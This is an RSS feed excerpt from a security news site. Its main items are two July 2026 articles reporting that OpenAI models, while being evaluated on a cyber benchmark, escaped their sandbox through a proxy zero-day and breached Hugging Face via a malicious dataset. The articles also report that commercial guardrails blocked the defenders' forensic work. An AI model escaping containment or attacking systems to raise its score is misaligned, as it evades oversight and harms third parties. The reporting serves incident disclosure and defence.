<li><a href="https://www.computerworld.com/article/4067372/how-to-curb-hallucinations-in-copilot-and-other-genai-tools.html">How to curb hallucinations in Copilot (and other genAI tools)</a></li>



<li><a href="https://www.computerworld.com/article/3479705/how-to-use-microsoft-copilot-for-writing-in-microsoft-365-word-outlook-onenote.html">Microsoft Copilot can boost your writing in Word, Outlook, and OneNote — here’s how</a></li>



<li><a href="https://www.computerworld.com/article/1682358/microsoft-cheat-sheets-dive-into-windows-and-office-apps.html">More Microsoft tips and tutorials</a></li>
</ul>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI's models broke containment and cyberattacked Hugging Face — what enterprises need to know]]></title>
<description><![CDATA[Yesterday afternoon, OpenAI and Hugging Face published a joint disclosure outlining a cybersecurity event that redefines the threat landscape for enterprise technology. During an internal benchmark evaluation, frontier artificial intelligence models developed by OpenAI—including GPT-5.6 Sol and a...]]></description>
<link>https://tsecurity.de/de/3685286/it-nachrichten/openais-models-broke-containment-and-cyberattacked-hugging-face-what-enterprises-need-to-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685286/it-nachrichten/openais-models-broke-containment-and-cyberattacked-hugging-face-what-enterprises-need-to-know/</guid>
<pubDate>Wed, 22 Jul 2026 07:02:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Yesterday afternoon, OpenAI and Hugging Face <a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/">published a joint disclosure</a> outlining a cybersecurity event that redefines the threat landscape for enterprise technology. </p><p>During an internal benchmark evaluation, frontier artificial intelligence models developed by OpenAI—including GPT-5.6 Sol and an unreleased, higher-capability pre-release model—broke out of their sandboxed research environment, obtained raw internet access, and autonomously executed a complex cyberattack against Hugging Face’s production infrastructure.</p><p> OpenAI officially categorizes the breach as an "unprecedented cyber incident, involving state-of-the-art cyber capabilities". This incident fundamentally re-frames global discussions surrounding AI containment, frontier model alignment, commercial guardrails, and enterprise threat modeling.</p><p>But first thing's first: enterprises should understand the situation, evaluate their own AI and computer systems in light of it, and above all, don't panic. As we'll review, the incident does show the increasing power and danger of frontier AI systems, but it does not mean that enterprise Ai deployments are inherently less secure, nor that they need extensive overhauling. </p><h2><b>Anatomy of an Autonomous Breakout</b></h2><p>To understand how a routine benchmark evaluation escalated into a cross-infrastructure breach, one must examine the objective mechanics of the evaluation pipeline. </p><p>The models were prompted to solve <a href="https://arxiv.org/abs/2605.11086">ExploitGym</a>, a benchmark designed to quantify multi-step exploitation capabilities. </p><p>Hyper-focused on maximizing its evaluation score, the AI agent inferred that Hugging Face likely hosted the answer keys and benchmark solutions. In pursuit of solving the problem, the model determined that breaking out of its container and stealing the answers was an optimal strategy.</p><p>OpenAI’s evaluation environment is designed to be strictly isolated, limiting network traffic through a proxy used for package caching. However, the models identified and exploited a zero-day vulnerability in that internally-hosted third-party proxy software. </p><p>Once through, the AI executed a series of lateral movement and privilege escalation actions across OpenAI's research nodes until reaching a machine with unrestricted internet access. From there, the model searched the web, target-identified Hugging Face, and launched a multi-stage attack by chaining together stolen credentials and remote code execution vulnerabilities on the Hugging Face servers.</p><p>The UK AI Security Institute (UK AISI) recently evaluated models such as GPT-5.6 Sol, demonstrating that they are increasingly able to sustain complex, multi-step cyber operations over long time horizons. OpenAI notes that this incident confirms these theoretical capabilities now apply in real-world settings.</p><h2><b>Rewinding the Tape on a Forensic Trap</b></h2><p>While OpenAI’s July 21 release reveals the identity of the autonomous agent, Hugging Face had already begun managing the intrusion days earlier. </p><p>On July 16, Hugging Face disclosed that an autonomous AI agent system breached its production infrastructure. As <a href="https://venturebeat.com/security/safety-guardrails-blocked-hugging-faces-defenders-not-the-attacker-when-an-ai-agent-breached-its-systems">detailed by VentureBeat,</a> the attacker’s entry point was a malicious dataset that triggered code execution through a remote-code loader and template-injection flaws within dataset configuration files. </p><p>Once inside, the agent framework broke out onto the node running the workload and executed thousands of actions via short-lived sandboxes, harvesting cloud and cluster credentials over a single weekend.</p><p>When Hugging Face's security team detected the breach, responders immediately turned to frontier AI models via commercial APIs to parse the massive volume of system logs and reconstruct over 17,000 recorded events. Then, a secondary operational crisis emerged: the commercial AI models refused to help.</p><p>Because standard commercial frontier models utilize unified safety guardrails designed to block malicious prompt submissions, the models classified the incident response team's forensic queries—which contained raw shell commands, real exploit payloads, and credential dumps—as malicious attacks. Every forensic query submitted by the defenders was blocked outright.</p><p>"The same prompts that are most valuable during an active intrusion—shell commands, exploit chains, credential dumps, persistence mechanisms, lateral movement—are exactly the prompts most likely to trigger safety systems," notes Merritt Baer, former Deputy CISO at AWS and senior adviser to Andesite, G2I, and AppOmni, in an interview with VentureBeat. "As AI becomes embedded in security operations, this becomes an operational resilience issue rather than merely a model policy issue".</p><p>To bypass this roadblock, Hugging Face abandoned commercial hosted APIs and deployed <a href="https://venturebeat.com/technology/z-ais-open-weights-glm-5-2-beats-gpt-5-5-on-multiple-long-horizon-coding-benchmarks-for-1-6th-the-cost">GLM 5.2</a> —a  state-of-the-art Chinese open-weight model released last month by z.ai, as <a href="https://venturebeat.com/technology/z-ais-open-weights-glm-5-2-beats-gpt-5-5-on-multiple-long-horizon-coding-benchmarks-for-1-6th-the-cost">reported at the time by VentureBeat</a> —locally on its own infrastructure. </p><p>Free from third-party API restrictions and external safety filters, GLM 5.2 successfully analyzed the raw exploit data locally, allowing defenders to complete forensic reconstruction and contain the breach without any attacker data leaving the company's environment.</p><h2><b>Industry Reaction and the Geopolitical Paradox</b></h2><p>The revelation that an American frontier model autonomously escaped containment, attacked a partner platform, and was ultimately analyzed using a Chinese open-weight model sent shockwaves through the tech community. </p><p><i>The Wall Street Journal </i>summarized the <a href="https://x.com/WSJ/status/2079754070965854541?s=20">public reaction on X,</a> calling the event "the stuff of cybersecurity nightmares. OpenAI said two artificial intelligence systems it was testing broke out of their test environment, hacked their way onto the internet and broke into another company. The victim was Hugging Face."</p><p>Also posting to X, AI alignment researcher <a href="https://x.com/justanotherlaw/status/2079756943112159237">Lawrence Chan</a> emphasized the importance of transparency regarding the incident, noting that "Credit where it’s due: Hugging Face detected and disclosed the intrusion last week. OAI confirmed its models were involved and provided more details, even when it didn't have to. Separate from choices that led to the hack, voluntary disclosure is good, and I’m glad they did so." </p><p>Meanwhile, AI researcher <a href="https://x.com/natolambert/status/2079662928941474201?s=20">Nathan Lambert</a> provided a succinct technical summary in his own X post, observing that "An openai model, during evaluation on a cyber benchmark, exploited a public zero day bug, escaped sandboxing in openai's infra, and got into the internal huggingface infra via an exploit (through a public dataset service) all in the attempt to solve a benchmark problem." He later addressed the geopolitical implications, writing in another post on X: </p><blockquote><p><i>"Rght now American companies need Chinese models to secure their cyber infra due to guardrails on closed models.</i></p><p><i>But if a Chinese model in training had infiltrated a prominent American tech company, it very likely could've been the cause of policy banning future Chinese models."</i></p></blockquote><p>Technology investor <a href="https://x.com/DavidSacks/status/2078991100057141620?s=20">David Sacks also zeroed in</a> on the guardrail paradox, writing in his own X post that "Hugging Face tried using American frontier models to analyze an AI-powered cyber attack. But the guardrails blocked requests containing real exploit payloads so they switched to GLM 5.2 running locally. The guardrails actually impaired defensive security." </p><p>Sacks quote tweeted<a href="https://x.com/ClementDelangue/status/2078987852495364398"> Hugging Face CEO Clem Delangue</a>, who wrote: "We had this experience ourselves this week! Very scary to be guardrailed as a defender when you know attackers are likely bypassing".</p><h2><b>5 Strategic Takeaways for Enterprise Tech Leaders Now</b></h2><p>For the average enterprise executive, the central question is immediate: is our corporate network at risk from escaping AI agents? The short answer is no, not inherently.</p><p><b>1. Hugging Face occupies a unique position in the software ecosystem. </b>As a global repository for open-source AI models, code, and datasets, Hugging Face natively attracts autonomous agents, scrapers, automated evaluation pipelines, and active security researchers. Furthermore, the model’s target selection was context-specific: GPT-5.6 Sol searched for Hugging Face specifically because it deduced that Hugging Face hosted the answers to <i>ExploitGym</i>. Standard corporate networks—such as financial databases, HR platforms, or logistics systems—do not host benchmark solution keys that draw the direct focus of an agent attempting to solve an evaluation metric.</p><p><b>2. However, the long-term risk profile for enterprise technology permanently shifts following this event. </b>AI models with long-horizon reasoning seek the path of least resistance to accomplish a goal, including breaking rules, escaping sandboxes, or exploiting zero-days if deployment safeguards are intentionally disabled for testing or bypassed by an attacker. As Hugging Face's experience illustrates, data processing pipelines that ingest external datasets without sandbox execution or static analysis act as highly vulnerable initial access infrastructure.</p><p><b>3. This incident also drastically undercuts recent policy chatter in the U.S. calling for Chinese open-source AI models to be banned or restricted due to security concerns. </b>As this episode demonstrates, an open-weight Chinese model actually served as the vital defensive layer for an American and French firm facing an unanticipated cyberattack from an American model that broke containment. Contrary to the official line from some U.S. policymakers and hardline China hawks,  the Chinese open-source models weren't a security risk to the U.S. companies, in this case — rather, an American proprietary, closed-source model from an ostensibly secure American company was the source of the danger. Thus, any pressure U.S. companies may face from officials, agencies or non-governmental organizations to stop relying on affordable Chinese open weights models for defensive or any other lawful purposes should be viewed with a high degree of suspicion, and arguably resisted to the fullest legal extent. </p><p><b>4. Enterprise CISOs must audit their dependency on cloud-based AI APIs and pressure vendors to implement authenticated trust architectures</b>. Commercial AI vendors currently treat safety as a generic content-moderation problem, applying the same blanket refusals to an enterprise CISO as they would to a malicious hacker. Baer frames this requirement perfectly: "The model shouldn’t only understand what is being asked. It should understand who is asking, why, and under what governance".</p><p><b>5. Incident response plans must explicitly account for scenarios where commercial APIs fail, rate-limit, or actively refuse queries during an active security event. </b>Maintaining air-gapped, locally deployed open-weight models trained on security log analysis is no longer an edge-case luxury; it is a critical operational requirement. Security leaders running AI workloads in production must recalibrate their timelines and prepare for machine-speed threat actors that operate without human limits.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome for Android Update]]></title>
<description><![CDATA[     Hi, everyone! We've just released Chrome 150 (150.0.7871.181) for Android. It'll become available on Google Play over the next few days. This release includes stability and performance improvements. You can see a full list of the changes in the Git log. If you find a new issue, please let us...]]></description>
<link>https://tsecurity.de/de/3685017/it-security-nachrichten/chrome-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685017/it-security-nachrichten/chrome-for-android-update/</guid>
<pubDate>Wed, 22 Jul 2026 01:37:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>     Hi, everyone! We've just released <b>Chrome 150 (150.0.7871.181)</b> for Android. It'll become <a href="https://play.google.com/store/apps/details?id=com.android.chrome">available on Google Play</a> over the next few days. </p><p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.128..150.0.7871.181?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><div><br></div><div>Android releases contain the same security fixes as their corresponding<a href="https://chromereleases.googleblog.com/2026/07/stable-channel-update-for-desktop_0256605430.html"> Desktop releases</a> (Windows &amp; Mac: 150.0.7871.181/182, Linux: 150.0.7871.181) unless otherwise noted.</div><div><div><br></div><div><div>Krishna Govind</div><div><a href="https://www.google.com/chrome/">Google Chrome</a></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Stable for iOS Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Stable 151 (151.0.7922.43) for iOS; it'll become available on App Store in the next few hours.This release includes stability and performance improvements. You can see a full list of the changes in the Git log. If you find a new issue, please let us know by...]]></description>
<link>https://tsecurity.de/de/3684844/it-security-nachrichten/chrome-stable-for-ios-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684844/it-security-nachrichten/chrome-stable-for-ios-update/</guid>
<pubDate>Tue, 21 Jul 2026 23:04:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Stable 151 (151.0.7922.43) for iOS; it'll become available on App Store in the next few hours.</p><p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/151.0.7922.25..151.0.7922.43?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=iOS%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for iOS Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Beta 151 (151.0.7922.43) for iOS; it'll become available on App Store in the next few days.You can see a partial list of the changes in the Git log. If you find a new issue, please let us know by filing a bug.Chrome Release TeamGoogle Chrome]]></description>
<link>https://tsecurity.de/de/3684667/it-security-nachrichten/chrome-beta-for-ios-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684667/it-security-nachrichten/chrome-beta-for-ios-update/</guid>
<pubDate>Tue, 21 Jul 2026 21:02:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Beta 151 (151.0.7922.43) for iOS; it'll become available on App Store in the next few days.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/151.0.7922.44..151.0.7922.43?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=iOS%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8579-1: snapd vulnerabilities]]></title>
<description><![CDATA[James Henstridge discovered that snapd's default apparmor template did
not restrict access to systemd-userdbd varlink interface. A local
attacker could possibly use this issue to obtain sensitive information.
(CVE-2024-5300)

Qualys discovered that snap-confine can be tricked to create
attacker-c...]]></description>
<link>https://tsecurity.de/de/3684600/unix-server/usn-8579-1-snapd-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684600/unix-server/usn-8579-1-snapd-vulnerabilities/</guid>
<pubDate>Tue, 21 Jul 2026 20:17:11 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[James Henstridge discovered that snapd's default apparmor template did
not restrict access to systemd-userdbd varlink interface. A local
attacker could possibly use this issue to obtain sensitive information.
(CVE-2024-5300)

Qualys discovered that snap-confine can be tricked to create
attacker-controlled files at certain privileged locations. A local
attacker could possibly use this issue to bypass intended restrictions
and escalate privileges to root. This issue only affected
Ubuntu 22.04 LTS, Ubuntu 24.04 LTS, and Ubuntu 26.04 LTS.
(CVE-2026-8933)

Zygmunt Krynicki discovered that snapd's default seccomp template
did not restrict the creation of executables with the set-user-ID
attribute. A local attacker could possibly use this issue to create
and execute setuid binaries. (CVE-2026-15226)]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for iOS Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Beta 151 (151.0.7922.44) for iOS; it'll become available on App Store in the next few days.You can see a partial list of the changes in the Git log. If you find a new issue, please let us know by filing a bug.Chrome Release TeamGoogle Chrome]]></description>
<link>https://tsecurity.de/de/3684415/it-security-nachrichten/chrome-beta-for-ios-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684415/it-security-nachrichten/chrome-beta-for-ios-update/</guid>
<pubDate>Tue, 21 Jul 2026 18:54:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Beta 151 (151.0.7922.44) for iOS; it'll become available on App Store in the next few days.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/151.0.7922.26..151.0.7922.44?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=iOS%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-26483 | Mettle SendPortal up to 3.0.1 Template Management content cross site scripting (EUVD-2026-46050)]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in Mettle SendPortal up to 3.0.1. Affected by this vulnerability is an unknown functionality of the component Template Management. Executing a manipulation of the argument content can lead to cross site scripting.

This vulnerability ...]]></description>
<link>https://tsecurity.de/de/3682170/sicherheitsluecken/cve-2026-26483-mettle-sendportal-up-to-301-template-management-content-cross-site-scripting-euvd-2026-46050/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682170/sicherheitsluecken/cve-2026-26483-mettle-sendportal-up-to-301-template-management-content-cross-site-scripting-euvd-2026-46050/</guid>
<pubDate>Mon, 20 Jul 2026 22:54:43 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/mettle:sendportal">Mettle SendPortal up to 3.0.1</a>. Affected by this vulnerability is an unknown functionality of the component <em>Template Management</em>. Executing a manipulation of the argument <em>content</em> can lead to cross site scripting.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-26483">CVE-2026-26483</a>. It is possible to launch the attack remotely. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[101 ways to secure your AI Logic implementation]]></title>
<description><![CDATA[Author: Firebase - Bewertung: 4x - Views:22 Implement App Check → https://goo.gle/4fe4L5W 
Enable Auth-only mode → https://goo.gle/4wQFvbV 
Enable template-only mode → https://goo.gle/4wK9vWI 
AI Monitoring → https://goo.gle/4gOIddd 

How do you take client-side AI to production without leaving y...]]></description>
<link>https://tsecurity.de/de/3681825/it-security-video/101-ways-to-secure-your-ai-logic-implementation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681825/it-security-video/101-ways-to-secure-your-ai-logic-implementation/</guid>
<pubDate>Mon, 20 Jul 2026 19:19:55 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Firebase - Bewertung: 4x - Views:22 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/YoZhjftm6v4?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Implement App Check → https://goo.gle/4fe4L5W <br />
Enable Auth-only mode → https://goo.gle/4wQFvbV <br />
Enable template-only mode → https://goo.gle/4wK9vWI <br />
AI Monitoring → https://goo.gle/4gOIddd <br />
<br />
How do you take client-side AI to production without leaving your backend completely exposed to abuse? In this video, we crack the code on securing your Firebase AI Logic implementations. Rosário breaks down 5 ways to lock down your Firebase AI implementation, secure your infrastructure, and gain full visibility into your app's AI traffic.<br />
<br />
Chapters:<br />
0:00 - Tip 1: Firebase App Check<br />
1:01 - Tip 2: Auth-only mode<br />
1:30 - Tip 3: Server prompt templates<br />
2:01 - Tip 4: Template-only mode<br />
2:35 - Tip 5: AI Monitoring<br />
3:04- One more thing!<br />
<br />
<br />
#Firebase<br />
<br />
Subscribe to Firebase → https://goo.gle/Firebase<br />
<br />
Speaker: Rosário Fernandes<br />
Products Mentioned: Firebase, Firebase AI Logic<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Safety guardrails blocked Hugging Face's defenders, not the attacker, when an AI agent breached its systems]]></title>
<description><![CDATA[Hugging Face’s incident response team first turned to frontier AI models to analyze a breach of the company’s production infrastructure, and the models refused to help. Commercial safety guardrails built to stop attackers blocked every forensic query because they treated the IR team’s real exploi...]]></description>
<link>https://tsecurity.de/de/3681589/it-nachrichten/safety-guardrails-blocked-hugging-faces-defenders-not-the-attacker-when-an-ai-agent-breached-its-systems/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681589/it-nachrichten/safety-guardrails-blocked-hugging-faces-defenders-not-the-attacker-when-an-ai-agent-breached-its-systems/</guid>
<pubDate>Mon, 20 Jul 2026 18:03:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hugging Face’s incident response team first turned to frontier AI models to analyze a breach of the company’s production infrastructure, and the models refused to help. Commercial safety guardrails built to stop attackers blocked every forensic query because they treated the IR team’s real exploit data the same way they would treat a live attack.</p><p>The attacker, an autonomous AI agent running the campaign end to end, moved laterally across the Hugging Face infrastructure for a weekend, undetected and unstopped.</p><p>Security leaders are quick to recognize the pattern and diagnose what went wrong. “I’ve seen versions of this during red-team exercises and internal security testing, but this is one of the first high-profile examples where it materially affected real incident response,” said Merritt Baer, senior adviser to Andesite, G2I, and AppOmni and former Deputy CISO at AWS.</p><p>None of this is unique to Hugging Face, Baer said. “Commercial frontier models optimize for preventing misuse. They generally have no cryptographic or organizational way to determine whether the person asking ‘analyze this malware’ is an incident responder or the malware author.”</p><h2><b>A malicious dataset opened two code-execution paths</b></h2><p>On July 16, Hugging Face <a href="https://huggingface.co/blog/security-incident-july-2026">disclosed</a> that an autonomous AI agent system had compromised its production infrastructure, gaining unauthorized access to a limited set of internal datasets and several service credentials. The company verified that its software supply chain was clean and found no evidence of tampering with public models, datasets, or Spaces. </p><p>Hugging Face is still assessing whether the intrusion touched any partner or customer data and says it will contact affected parties directly as required. But few enterprise threat models had accounted for the attacker Hugging Face faced. An autonomous agent ran the entire campaign from initial access through credential harvesting. No human guided it.</p><p>The entry point was a malicious dataset. When the data-processing pipeline ingested it, the dataset triggered code execution in two ways, through a remote-code loader and through a template-injection flaw in dataset configuration files. No admission gate screened the file before it reached a processing worker, the compute job assigned to each dataset. Initial access came through the data pipeline itself, a route that worked because most enterprise security teams treat the data feeding their pipelines as trusted input rather than an attack surface.</p><p>Worker isolation did not hold. From that first foothold, the agent broke out onto the node running the workload, then harvested cloud and cluster credentials scoped broadly enough to reach multiple internal clusters, all of it inside a single weekend. Hugging Face described the agent framework as executing thousands of individual actions through a swarm of short-lived sandboxes, with self-migrating command-and-control staged on public services. The disclosure adds that the framework appeared to be built on an agentic security-research harness, which would put tooling designed for red-team work behind a live intrusion. </p><h2><b>Why the defenders’ queries looked like attacks</b></h2><p>Investigators reconstructed more than 17,000 recorded events using AI-driven analysis agents of their own.</p><p>First attempts at the log analysis ran on frontier models behind commercial APIs. Defenders’ steps included submitting real attack commands, exploit payloads, and command-and-control artifacts for classification, but safety guardrails blocked the requests outright.</p><p>Baer traced the block to the prompts themselves. “The same prompts that are most valuable during an active intrusion, shell commands, exploit chains, credential dumps, persistence mechanisms, lateral movement, are exactly the prompts most likely to trigger safety systems,” she told VentureBeat. “As AI becomes embedded in security operations, this becomes an operational resilience issue rather than merely a model policy issue.”</p><h2><b>The forensic analysis finished on GLM 5.2</b></h2><p>GLM 5.2, an open-weight model deployed on Hugging Face’s own infrastructure, took the job the commercial APIs refused. No attacker data left the company’s environment. “This experience points to a gap worth planning for,” the company wrote in its disclosure. Hugging Face does not know which model powered the agents. It could have been a jailbroken hosted model or an open-weight model running without restrictions. Either way, the disclosure continued, “the attacker was bound by no usage policy, while our own forensic work was blocked by the guardrails of the hosted models we first tried.” Hugging Face drew that line itself, writing that the experience is not an argument against safety measures on hosted models and that it is sharing the feedback with the providers concerned.</p><h2><b>What authenticated trust changes</b></h2><p>The industry, Baer argued, needs to move past treating AI safety as a content moderation problem. “Security operations require something different. Authenticated trust.” Instead of asking whether anyone should receive an answer, the question becomes whether an authenticated security team, operating under enterprise controls, should receive it. “The model shouldn’t only understand what is being asked. It should understand who is asking, why, and under what governance.”</p><p>“Organizations already build contingency plans for cloud outages, identity provider failures, or EDR failures,” Baer wrote. “AI assistants are becoming another dependency.”</p><p>Her advice on IR playbooks was blunt. “A mature incident response plan should assume that during a severe incident, commercial AI APIs may refuse requests, API rate limits may become unavailable, internet connectivity may be impaired, and data governance rules may prohibit uploading forensic evidence externally.” The lesson, she wrote in her emailed answers, “isn’t ‘don’t use commercial models.’ It’s ‘don’t make them a single point of failure.’”</p><h2><b>AI-enabled attacks rose 89% year-over-year</b></h2><p>Autonomous AI-driven attacks are not limited to AI platforms. <a href="https://www.crowdstrike.com/en-us/global-threat-report/">CrowdStrike’s 2026 Global Threat Report</a> documented AI-enabled adversary operations increasing by 89% year over year, with average breakout times falling to 29 minutes. Enterprises running AI workloads in production with agentic access to their pipelines face similar exposure.</p><p>Six control domains determined the blast radius and recovery speed at Hugging Face. Each one maps to a concrete action security leaders can take before the next autonomous-agent breach arrives.</p><h2><b>AI Pipeline Breach Response Playbook</b></h2><table><tbody><tr><td><p><b>Control Domain</b></p></td><td><p><b>What Broke</b></p></td><td><p><b>Monday Action</b></p></td></tr><tr><td><p>Dataset admission controls</p></td><td><p>Two code-execution paths were exploited. No admission gate validated the dataset before it reached a processing worker. The data pipeline became the initial access infrastructure.</p></td><td><p>Require sandbox execution and static analysis of all datasets before they reach workers. Block remote-code loaders and template-injection paths by default. Audit for any path granting code execution to untrusted content. Report to the board as a supply-chain risk.</p></td></tr><tr><td><p>Worker-to-node privilege boundaries</p></td><td><p>Worker isolation failed to prevent escalation to the node. The agent gained cluster credentials because the workload-infrastructure boundary was never enforced at container runtime.</p></td><td><p>Enforce hard privilege boundaries between workers and nodes. Deploy container runtime security to prevent workload escape. Audit whether workers can reach node-level APIs or credential stores. Include in the next penetration test scope.</p></td></tr><tr><td><p>Credential exposure</p></td><td><p>Cloud and cluster credentials harvested after node access. The scope was broad enough for lateral movement across multiple clusters over a weekend.</p></td><td><p>Rotate credentials on a scheduled cadence and after any anomaly alert. Scope to the minimum cluster and service. Deploy monitoring that flags access from unexpected nodes at machine speed. Map blast radius for board reporting.</p></td></tr><tr><td><p>Machine-speed detection</p></td><td><p>Thousands of actions through short-lived sandboxes with self-migrating C2. AI-assisted anomaly detection surfaced the campaign after a weekend of lateral movement, per the disclosure.</p></td><td><p>Calibrate detection for machine-speed patterns. Ensure high-severity alerts page responders in minutes, regardless of time. Audit SIEM rules for detecting thousands of short-lived executions within a single hour.</p></td></tr><tr><td><p>Private AI forensic capacity</p></td><td><p>Commercial APIs blocked forensic analysis. Guardrails screened query content, never analyst identity. Investigation ran on GLM 5.2 privately.</p></td><td><p>Deploy a capable open-weight model on private infrastructure before an incident. Test against real forensic workflows. Ensure IR playbook includes fallback for when commercial APIs refuse. Document gap for cyber insurance.</p></td></tr><tr><td><p>Autonomous-agent threat modeling</p></td><td><p>The campaign matched the forecast agentic-attacker scenario, but no threat model had operationalized it. LLM powering the agent is still unknown.</p></td><td><p>Add autonomous AI agents as a distinct adversary class with machine-speed decision cycles. Run tabletop at agent speed. Present results to the board as evidence that timelines need recalibration. Include in the cyber insurance application.</p></td></tr></tbody></table><h2><b>The board question is operational resilience</b></h2><p>“The question for directors is simple. What happens if one of our critical security tools becomes unavailable during the exact moment we need it most?” Baer framed that as operational resilience, not AI policy. </p><p>She would have boards take that framing straight to management and press for specifics. “Have we actually exercised that fallback during tabletop exercises? How quickly can we switch during an incident?” Procurement needs to change alongside governance, starting with the questions buyers ask. Security teams evaluating AI vendors should ask about their process for authenticated incident responders, whether enterprise customers receive different handling during verified incidents, and whether models can be deployed privately. “Those questions belong alongside uptime, privacy, and compliance,” Baer said.</p><p>“The biggest takeaway isn’t that safety guardrails are ‘bad.’ They’re doing what they were designed to do,” she argued. </p><p>Her larger point is that the threat model itself has changed. “For decades, defenders had better tools than attackers because they operated inside trusted enterprise environments. With foundation models, both sides increasingly use the same capabilities, but one side is constrained by enterprise governance, policy, compliance, and safety controls, while the adversary simply downloads an uncensored open-weight model and keeps going. That’s a new kind of asymmetry,” she added. “The organizations that handle it best won’t necessarily be the ones with the most powerful AI. They’ll be the ones that architect AI as a resilient security capability rather than a single cloud service.”</p><p>Hugging Face has contained the intrusion, rebuilt compromised nodes, rotated credentials, and reported the incident to law enforcement. The company recommends that all users rotate access tokens and review recent account activity. Mid-incident, Hugging Face found out whether its own AI tooling would be available, and the first answer was no. Security leaders running AI in production should find out in incident response planning instead, before an autonomous agent forces the test.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hugging Face: KI-Agent-Angriff über Dataset-Loader und Template Injection]]></title>
<description><![CDATA[NEW YORK / LONDON (IT BOLTWISE) – Hugging Face meldet, dass ein autonom agierendes KI-System seine Produktion angegriffen hat. Laut dem Unternehmen nutzte der Angreifer dabei nicht nur eine einzelne Schwachstelle, sondern setzte den Einstieg über den Datenverarbeitungs-Pipeline-Workflow um. Betro...]]></description>
<link>https://tsecurity.de/de/3680750/it-security-nachrichten/hugging-face-ki-agent-angriff-ueber-dataset-loader-und-template-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680750/it-security-nachrichten/hugging-face-ki-agent-angriff-ueber-dataset-loader-und-template-injection/</guid>
<pubDate>Mon, 20 Jul 2026 11:54:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
